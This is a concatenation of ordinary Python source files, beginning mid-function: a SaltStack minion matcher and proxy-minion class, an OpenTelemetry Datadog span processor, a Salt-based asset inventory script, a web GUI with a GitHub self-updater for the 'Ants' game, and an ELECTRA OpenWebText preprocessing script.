if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
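# --- Editor's sketch (illustrative, not part of the original source) ---
# How Matcher evaluates a compound target; the minion id and grains below are
# hypothetical:
#
#     m = Matcher({'id': 'web01', 'grains': {'os': 'Ubuntu'}})
#     m.glob_match('web*')          # True: the minion id matches the glob
#     m.grain_match('os:Ubuntu')    # True: grain glob match via subdict_match
#     m.compound_match('G@os:Ubuntu and web*')
#     # tokens  -> ['G@os:Ubuntu', 'and', 'web*']
#     # results -> ['True', 'and', 'True']
#     # eval('True and True') -> True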
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
        # module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
spanprocessor.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.instrumentation.utils import _SUPPRESS_INSTRUMENTATION_KEY
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.sdk.trace.export import SpanExporter
from opentelemetry.trace import INVALID_TRACE_ID
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class DatadogExportSpanProcessor(SpanProcessor):
"""Datadog exporter span processor
DatadogExportSpanProcessor is an implementation of `SpanProcessor` that
batches all opened spans into a list per trace. When all spans for a trace
    are ended, the trace is queued up for export. This is required for exporting
    to the Datadog Agent, which expects to receive a list of spans for each trace.
"""
_FLUSH_TOKEN = INVALID_TRACE_ID
def __init__(
self,
span_exporter: SpanExporter,
schedule_delay_millis: float = 5000,
max_trace_size: int = 4096,
):
if max_trace_size <= 0:
            raise ValueError("max_trace_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
self.span_exporter = span_exporter
# queue trace_ids for traces with recently ended spans for worker thread to check
# for exporting
self.check_traces_queue = (
collections.deque()
) # type: typing.Deque[int]
self.traces_lock = threading.Lock()
# dictionary of trace_ids to a list of spans where the first span is the
# first opened span for the trace
self.traces = collections.defaultdict(list)
# counter to keep track of the number of spans and ended spans for a
# trace_id
self.traces_spans_count = collections.Counter()
self.traces_spans_ended_count = collections.Counter()
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
# threading conditions used for flushing and shutdown
self.condition = threading.Condition(threading.Lock())
self.flush_condition = threading.Condition(threading.Lock())
        # flag to indicate that there is a flush operation in progress
self._flushing = False
self.max_trace_size = max_trace_size
self._spans_dropped = False
self.schedule_delay_millis = schedule_delay_millis
self.done = False
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
# check upper bound on number of spans for trace before adding new
# span
if self.traces_spans_count[trace_id] == self.max_trace_size:
logger.warning("Max spans for trace, spans will be dropped.")
self._spans_dropped = True
return
# add span to end of list for a trace and update the counter
self.traces[trace_id].append(span)
self.traces_spans_count[trace_id] += 1
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
self.traces_spans_ended_count[trace_id] += 1
if self.is_trace_exportable(trace_id):
self.check_traces_queue.appendleft(trace_id)
def worker(self):
timeout = self.schedule_delay_millis / 1e3
while not self.done:
if not self._flushing:
with self.condition:
self.condition.wait(timeout)
if not self.check_traces_queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
continue
if self.done:
# missing spans will be sent when calling flush
break
            # subtract the duration of this export call from the next timeout
start = _time_ns()
self.export()
end = _time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
# be sure that all spans are sent
self._drain_queue()
def is_trace_exportable(self, trace_id):
return (
self.traces_spans_count[trace_id]
- self.traces_spans_ended_count[trace_id]
<= 0
)
def export(self) -> None:
"""Exports traces with finished spans."""
notify_flush = False
export_trace_ids = []
while self.check_traces_queue:
trace_id = self.check_traces_queue.pop()
if trace_id is self._FLUSH_TOKEN:
notify_flush = True
else:
with self.traces_lock:
# check whether trace is exportable again in case that new
# spans were started since we last concluded trace was
# exportable
if self.is_trace_exportable(trace_id):
export_trace_ids.append(trace_id)
del self.traces_spans_count[trace_id]
del self.traces_spans_ended_count[trace_id]
if len(export_trace_ids) > 0:
token = attach(set_value(_SUPPRESS_INSTRUMENTATION_KEY, True))
for trace_id in export_trace_ids:
with self.traces_lock:
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.traces[trace_id]) # type: ignore
# pylint: disable=broad-except
except Exception:
logger.exception(
"Exception while exporting Span batch."
)
finally:
del self.traces[trace_id]
detach(token)
if notify_flush:
with self.flush_condition:
self.flush_condition.notify()
def _drain_queue(self):
"""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
        `export`, which is not thread safe.
"""
while self.check_traces_queue:
self.export()
def force_flush(self, timeout_millis: int = 30000) -> bool:
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
self._flushing = True
self.check_traces_queue.appendleft(self._FLUSH_TOKEN)
# wake up worker thread
with self.condition:
self.condition.notify_all()
# wait for token to be processed
with self.flush_condition:
ret = self.flush_condition.wait(timeout_millis / 1e3)
self._flushing = False
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
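# --- Editor's usage sketch (illustrative, not part of the original module) ---
# Minimal wiring of DatadogExportSpanProcessor into the OpenTelemetry SDK.
# ConsoleSpanExporter stands in for the real Datadog exporter purely so the
# sketch is self-contained; in real use pass the Datadog span exporter instead.
if __name__ == "__main__":
    from opentelemetry import trace
    from opentelemetry.sdk.trace import TracerProvider
    from opentelemetry.sdk.trace.export import ConsoleSpanExporter
    provider = TracerProvider()
    provider.add_span_processor(
        DatadogExportSpanProcessor(ConsoleSpanExporter(), schedule_delay_millis=1000)
    )
    trace.set_tracer_provider(provider)
    tracer = trace.get_tracer(__name__)
    with tracer.start_as_current_span("parent"):
        with tracer.start_as_current_span("child"):
            pass  # both spans end here, so the whole trace becomes exportable
    provider.shutdown()  # shuts down the processor, which drains and exports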
|
asset_info.py
|
#!/usr/bin/env python
# coding: utf8
'''
@Creator: valor7
@Email: valor7@163.com
@File: asset_info.py
@Time: 2017/10/15 15:33
@desc:
'''
from deploy.saltapi import SaltAPI
from oms_valor7 import settings
import threading
asset_info = []
def GetInfoDict(r, arg):
try:
result = ''
for k in r[arg]:
result = result + k + ': ' + str(r[arg][k]) + '\n'
except:
result = 'Nan'
return result
def GetInfo(r, arg):
try:
arg = str(r[arg])
except:
arg = 'Nan'
return arg
def GetAssetInfo(tgt):
'''
    Fetch host information via the Salt API and format it for output
'''
global asset_info
info = {}
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
ret = sapi.remote_server_info(tgt, 'grains.items')
info['sn']=GetInfo(ret,'serialnumber')
info['hostname']=GetInfo(ret,'fqdn')
info['nodename']=tgt
info['os']=GetInfo(ret,'os')+GetInfo(ret,'osrelease')+' '+GetInfo(ret,'osarch')
info['manufacturer']=GetInfo(ret,'manufacturer')
info['cpu_model']=GetInfo(ret,'cpu_model')
info['productname']=GetInfo(ret,'productname')
info['cpu_nums']=GetInfo(ret,'num_cpus')
info['kernel'] = GetInfo(ret,'kernel') + GetInfo(ret,'kernelrelease')
info['zmqversion'] = GetInfo(ret,'zmqversion')
info['shell'] = GetInfo(ret,'shell')
info['saltversion'] = GetInfo(ret,'saltversion')
info['locale'] = GetInfoDict(ret, 'locale_info')
info['selinux'] = GetInfoDict(ret, 'selinux')
if 'virtual_subtype' in ret:
virtual = GetInfo(ret,'virtual') + '-' + GetInfo(ret,'virtual_subtype')
else:
virtual=GetInfo(ret,'virtual')
info['virtual'] = virtual
try:
hwaddr = ret['hwaddr_interfaces']
ipaddr = ret['ip4_interfaces']
hwaddr.pop('lo')
ipaddr.pop('lo')
network = ''
for i in ipaddr:
ip = ''
for j in ipaddr[i]:
ip = ip + j + '/'
network = network + i + ': ' + ip.strip('/') + '-' + hwaddr[i] + '\n'
info['network'] = network
except:
info['network'] = 'Nan'
    mem = GetInfo(ret, 'mem_total')
    try:
        mem = int(mem)
        if mem > 1000:
            memory = ('%.1f' % (mem / 1000.0)) + 'G'
        else:
            memory = str(mem) + 'M'
    except ValueError:
        # mem_total grain was missing ('Nan') or not numeric
        memory = 'Nan'
    info['memory'] = memory
ret = sapi.remote_server_info(tgt, 'disk.usage')
disk = ''
for i in ret:
r = int(ret[i]['1K-blocks'])/1000
if r > 1000:
r = r/1000
s = str(r) + 'G'
if r > 1000:
r = r/1000.0
s = ('%.1f'%r) + 'T'
else:
s = str(r) + 'M'
disk = disk + i + ': ' + s + '\n'
info['disk'] = disk
asset_info.append(info)
def MultipleCollect(tgt_list):
global asset_info
asset_info = []
threads = []
loop = 0
count = len(tgt_list)
for i in range(0, count, 2):
keys = range(loop*2, (loop+1)*2, 1)
        # instantiate the threads
for i in keys:
if i >= count:
break
else:
t = threading.Thread(target=GetAssetInfo, args=(tgt_list[i],))
threads.append(t)
        # start the threads
for i in keys:
if i >=count:
break
else:
threads[i].start()
        # wait for the concurrent threads to finish
for i in keys:
if i >= count:
break
else:
threads[i].join()
loop = loop + 1
return asset_info
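# --- Editor's usage sketch (illustrative, not part of the original module) ---
# Collect grains/disk information for a batch of minions, two at a time.
# Assumes a reachable salt-api configured in settings.SALT_API; the minion ids
# below are placeholders.
if __name__ == '__main__':
    for host in MultipleCollect(['web01', 'web02', 'db01']):
        print('%s  %s  mem=%s' % (host['nodename'], host['os'], host['memory']))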
|
gui.py
|
import ants
import ants_strategies
import utils
import state
import json
import distutils.core
import distutils.dir_util
import urllib.request
import os
import shutil
import zipfile
import threading
import importlib
from time import sleep
from ucb import *
VERSION = 1.2
ASSETS_DIR = "assets/"
INSECT_DIR = "insects/"
STRATEGY_SECONDS = 3
INSECT_FILES = {
'Worker': ASSETS_DIR + INSECT_DIR + "ant_harvester.gif",
'Thrower': ASSETS_DIR + INSECT_DIR + "ant_thrower.gif",
'Long': ASSETS_DIR + INSECT_DIR + "ant_longthrower.gif",
'Short': ASSETS_DIR + INSECT_DIR + "ant_shortthrower.gif",
'Harvester': ASSETS_DIR + INSECT_DIR + "ant_harvester.gif",
'Fire': ASSETS_DIR + INSECT_DIR + "ant_fire.gif",
'Bodyguard': ASSETS_DIR + INSECT_DIR + "ant_bodyguard.gif",
'Hungry': ASSETS_DIR + INSECT_DIR + "ant_hungry.gif",
'Slow': ASSETS_DIR + INSECT_DIR + "ant_slow.gif",
'Scary': ASSETS_DIR + INSECT_DIR + "ant_scary.gif",
'Laser': ASSETS_DIR + INSECT_DIR + "ant_laser.gif",
'Ninja': ASSETS_DIR + INSECT_DIR + "ant_ninja.gif",
'Wall': ASSETS_DIR + INSECT_DIR + "ant_wall.gif",
'Scuba': ASSETS_DIR + INSECT_DIR + "ant_scuba.gif",
'Queen': ASSETS_DIR + INSECT_DIR + "ant_queen.gif",
'Tank': ASSETS_DIR + INSECT_DIR + "ant_tank.gif",
'Bee': ASSETS_DIR + INSECT_DIR + "bee.gif",
'Remover': ASSETS_DIR + INSECT_DIR + "remove.png",
}
class GUI:
"""Browser based GUI that communicates with Python game engine"""
def __init__(self):
self.active = True
self.cleanState()
def cleanState(self):
self.initialized = False
self.state = state.State()
self.gameOver = False
self.gamestate = None
self.currentBeeId = 0
self.currentInsectId = 0
self.insects = []
self.bees = []
self.deadbees = []
self.deadinsects = []
self.insectToId = {}
self.beeToId = {}
self.beeLocations = {}
def makeHooks(self):
ants.Insect.death_callback = dead_insect
def newGameThread(self):
print("Trying to start new game")
self.cleanState() # resets GUI state
importlib.reload(ants) # resets ants, e.g. with newly implemented Ants
self.makeHooks()
self.winner = ants_strategies.start_with_strategy(gui.args, gui.strategy, ants)
self.gameOver = True
self.saveState("winner", self.winner)
self.saveState("gameOver", self.gameOver)
# self.killGUI()
update()
def killGUI(self):
self.active = False
def startGame(self, data=None):
threading.Thread(target=self.newGameThread).start()
print("Game started")
def exit(self, data=None):
self.active = False
def initialize_colony_graphics(self, gamestate):
self.gamestate = gamestate
self.ant_type_selected = -1
self.saveState("strategyTime", STRATEGY_SECONDS)
self.saveState("food", self.gamestate.food)
self.ant_types = self.get_ant_types()
self._init_places(gamestate)
self.saveState("places", self.places)
# Finally log that we are initialized
self.initialized = True
def get_ant_types(self, noSave=False):
        ant_types = []
for name, ant_type in self.gamestate.ant_types.items():
ant_types.append({"name": name, "cost": ant_type.food_cost, "img": self.get_insect_img_file(name)})
# Sort by cost
ant_types.sort(key=lambda item: item["cost"])
if not noSave:
self.saveState("ant_types", ant_types)
return ant_types
def get_insect_img_file(self, name):
return INSECT_FILES[name]
def getState(self, data=None):
"""Get our message from JSON"""
return self.state.getState()
def saveState(self, key, val):
"""Saves our game object to JSON file"""
self.state.updateState(key, val)
def strategy(self, gamestate):
"""The strategy function is called by ants.GameState each turn"""
# Have we initialized our graphics yet?
if not self.initialized:
# No, so do that now
self.initialize_colony_graphics(gamestate)
elapsed = 0 # Physical time elapsed this turn
self.saveState("time", int(elapsed))
while elapsed < STRATEGY_SECONDS:
self.saveState("time", gamestate.time)
self._update_control_panel(gamestate)
sleep(0.25)
elapsed += 0.25
def get_place_row(self, name):
return name.split("_")[1]
def get_place_column(self, name):
return name.split("_")[2]
def _init_places(self, gamestate):
"""Calculate all of our place data"""
        self.places = {}
self.images = {'AntQueen': dict()}
rows = 0
cols = 0
for name, place in gamestate.places.items():
if place.name == 'Hive':
continue
pCol = self.get_place_column(name)
pRow = self.get_place_row(name)
if place.exit.name == 'AntQueen':
rows += 1
if not pRow in self.places:
self.places[pRow] = {}
self.places[pRow][pCol] = {"name": name, "type": "tunnel", "water": 0, "insects": {}}
if "water" in name:
self.places[pRow][pCol]["water"] = 1
self.images[name] = dict()
# Add the Hive
        self.places[gamestate.beehive.name] = {"name": gamestate.beehive.name, "type": "beehive", "water": 0, "insects": {}}
self.places[gamestate.beehive.name]["insects"] = []
for bee in gamestate.beehive.bees:
self.places[gamestate.beehive.name]["insects"].append({"id": self.currentBeeId, "type": "bee"})
self.beeToId[bee] = self.currentBeeId
self.currentBeeId += 1
self.saveState("rows", len(self.places))
        self.saveState("places", self.places)
def update_food(self):
self.saveState("food", self.gamestate.food)
def _update_control_panel(self, gamestate):
"""Reflect the game state in the play area."""
self.update_food()
old_insects = self.insects[:]
old_bees = self.bees[:]
self.bees, self.insects = [], []
for name, place in gamestate.places.items():
if place.name == 'Hive':
continue
pCol = self.get_place_column(name)
pRow = self.get_place_row(name)
if place.ant is not None:
if self.insectToId[place.ant] not in self.insects:
# Add this ant to our internal list of insects
self.insects.append(self.insectToId[place.ant])
# Ok there is an ant that needs to be drawn here
self.places[pRow][pCol]["insects"] = {
"id": self.insectToId[place.ant],
"type": place.ant.name,
"img": self.get_insect_img_file(place.ant.name)
}
# Check if it's a container ant
if place.ant is not None:
ant_container = isinstance(place.ant, ants.ContainerAnt)
self.places[pRow][pCol]["insects"]["container"] = ant_container
if ant_container and place.ant.ant_contained:
self.places[pRow][pCol]["insects"]["contains"] = {
"type": place.ant.ant_contained.name,
"img": self.get_insect_img_file(place.ant.ant_contained.name)
}
else:
self.places[pRow][pCol]["insects"] = {}
# Loop through our bees
for bee in place.bees:
self.beeLocations[self.beeToId[bee]] = name
if self.beeToId[bee] not in self.bees:
self.bees.append(self.beeToId[bee])
# Save our new bee locations to our game state
self.saveState("beeLocations", self.beeLocations)
def deployAnt(self, data):
# Check to see if the ant is a remover. If so we need to remove the ant in pname
pname, ant = data["pname"], data["ant"]
if ant == "Remover":
existing_ant = self.gamestate.places[pname].ant
if existing_ant is not None:
print("gamestate.remove_ant('{0}')".format(pname))
self.gamestate.remove_ant(pname)
return
insect = None
try:
print("gamestate.deploy_ant('{0}', '{1}')".format(pname, ant))
            insect = self.gamestate.deploy_ant(pname, ant)
except Exception as e:
print(e)
return {"error": str(e)}
if not insect:
return {"error": "Unable to deploy ant"}
id = self.currentInsectId
self.insects.append(id)
self.insectToId[insect] = id
self.currentInsectId += 1
        self._update_control_panel(self.gamestate)
return {"success": 1, "id": id}
import http.server
import cgi
class HttpHandler(http.server.SimpleHTTPRequestHandler):
# Override the default do_POST method
def log_message(self, format, *args):
# I hate this console output so simply do nothing.
return
def cgiFieldStorageToDict(self, fieldStorage):
""" Get a plain dictionary rather than the '.value' system used by the
cgi module's native fieldStorage class. """
params = {}
for key in fieldStorage.keys():
params[key] = fieldStorage[key].value
return params
def do_POST(self):
path = self.path
action = {
'/ajax/fetch/state': gui.getState,
'/ajax/start/game': gui.startGame,
'/ajax/exit': gui.exit,
'/ajax/deploy/ant': gui.deployAnt,
}.get(path)
if not action:
# We could not find a valid route
return
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
data = self.cgiFieldStorageToDict(form)
response = action(data)
self.send_response(200)
if response:
self.send_header('Content-Type', 'application/json')
self.end_headers()
response = json.dumps(response)
self.wfile.write(response.encode('ascii'))
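# --- Editor's sketch (illustrative, not part of the original module) ---
# The browser front end drives the game entirely through the POST routes listed
# in do_POST above. A rough way to poke a running server from Python (run()
# below binds to the first free port starting at 8000):
#
#     import json, urllib.parse, urllib.request
#     body = urllib.parse.urlencode({}).encode()
#     req = urllib.request.Request('http://localhost:8000/ajax/fetch/state', data=body)
#     req.add_header('Content-Type', 'application/x-www-form-urlencoded')
#     state = json.loads(urllib.request.urlopen(req).read().decode())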
def dead_insect(ant):
print('{0} ran out of health and expired'.format(ant))
if ant in gui.insectToId:
gui.deadinsects.append(gui.insectToId[ant])
gui.saveState("deadinsects", gui.deadinsects)
elif ant in gui.beeToId:
gui.deadbees.append(gui.beeToId[ant])
gui.saveState("deadbees", gui.deadbees)
def update():
request = urllib.request.Request("https://api.github.com/repos/colinschoen/Ants-Web-Viewer/releases/latest")
data = None
print("Checking for updates...")
try:
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
except urllib.request.URLError as e:
print('Unable to check for updates')
if data:
release_version = float(data["name"])
if release_version > VERSION:
print("Local version of", VERSION, "is behind remote version of", release_version)
get_update(data["zipball_url"], data["name"])
else:
print("Local version of", VERSION, "is current with or ahead of remote version of", release_version)
def get_update(url, version):
request = urllib.request.Request(url)
print("Downloading new version...")
try:
response = urllib.request.urlopen(request)
with open(version + ".zip", 'wb') as f:
f.write(response.read())
f = zipfile.ZipFile(version + ".zip")
f.extractall(version)
# Delete original archive
os.remove(version + ".zip")
os.chdir(version)
os.chdir(os.listdir()[0])
files = os.listdir()
dirs = []
for f in files:
# Skip hidden files and .md files
if f[0] == "." or f[-3:] == ".md":
continue
if os.path.isdir(f):
dirs.append(f)
continue
# Copy the files up two directories
shutil.copy(f, "../../" + f)
for d in dirs:
distutils.dir_util.copy_tree(d, "../../" + d)
# Delete our temp directory
os.chdir('../..')
print("Cleaning up...")
shutil.rmtree(version)
print("Update complete")
except Exception as e:
print("Error:", e)
import socketserver, socket
class CustomThreadingTCPServer(socketserver.ThreadingTCPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
@main
def run(*args):
# Start webserver
import socketserver
import webbrowser
import sys
PORT = 8000
global gui
gui = GUI()
gui.args = args
# Basic HTTP Handler
#Handler = http.server.SimpleHTTPRequestHandler
for PORT in range(8000, 8100):
try:
httpd = CustomThreadingTCPServer(("", PORT), HttpHandler)
break
        except OSError:
            # port already in use; try the next one
            pass
else:
print("Could not start webserver: all ports in range 8000-8099 are taken")
sys.exit(1)
print("Web Server started @ localhost:" + str(PORT))
def start_http():
while gui.active:
httpd.handle_request()
print("Web server terminated")
threading.Thread(target=start_http).start()
try:
webbrowser.open("http://localhost:" + str(PORT) + '/gui.html', 2)
except Exception:
print("Unable to automatically open web browser.")
print("Point your browser to http://localhost:" + str(PORT) + '/gui.html')
|
build_openwebtext_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Preprocessess the Open WebText corpus for ELECTRA pre-training."""
import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
owt_dir = os.path.join(args.data_dir, "openwebtext")
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = build_pretraining_dataset.ExampleWriter(
job_id=job_id,
vocab_file=os.path.join(args.data_dir, "vocab.txt"),
output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=False,
do_lower_case=args.do_lower_case,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(owt_dir))
fnames = [f for (i, f) in enumerate(fnames) if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0 and file_no % 10 == 0:
elapsed = time.time() - start_time
log(
"processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no,
len(fnames),
100.0 * file_no / len(fnames),
int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written,
)
)
utils.rmkdir(job_tmp_dir)
with tarfile.open(os.path.join(owt_dir, fname)) as f:
f.extractall(job_tmp_dir)
extracted_files = tf.io.gfile.listdir(job_tmp_dir)
random.shuffle(extracted_files)
for txt_fname in extracted_files:
example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--data-dir", required=True, help="Location of data (vocab file, corpus, etc).")
parser.add_argument("--max-seq-length", default=128, type=int, help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int, help="Parallelize across multiple processes.")
parser.add_argument("--do-lower-case", dest="do_lower_case", action="store_true", help="Lower case input text.")
parser.add_argument(
"--no-lower-case", dest="do_lower_case", action="store_false", help="Don't lower case input text."
)
parser.set_defaults(do_lower_case=True)
args = parser.parse_args()
utils.rmkdir(os.path.join(args.data_dir, "pretrain_tfrecords"))
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
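# --- Editor's usage sketch (illustrative, not part of the original script) ---
# Expected layout under --data-dir (paths and names are placeholders):
#   <data-dir>/vocab.txt           vocabulary file passed to ExampleWriter
#   <data-dir>/openwebtext/        tar archives of raw text files
# Output TFRecords are written to <data-dir>/pretrain_tfrecords, e.g.:
#
#   python build_openwebtext_pretraining_dataset.py \
#       --data-dir /path/to/electra_data \
#       --max-seq-length 128 \
#       --num-processes 8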
|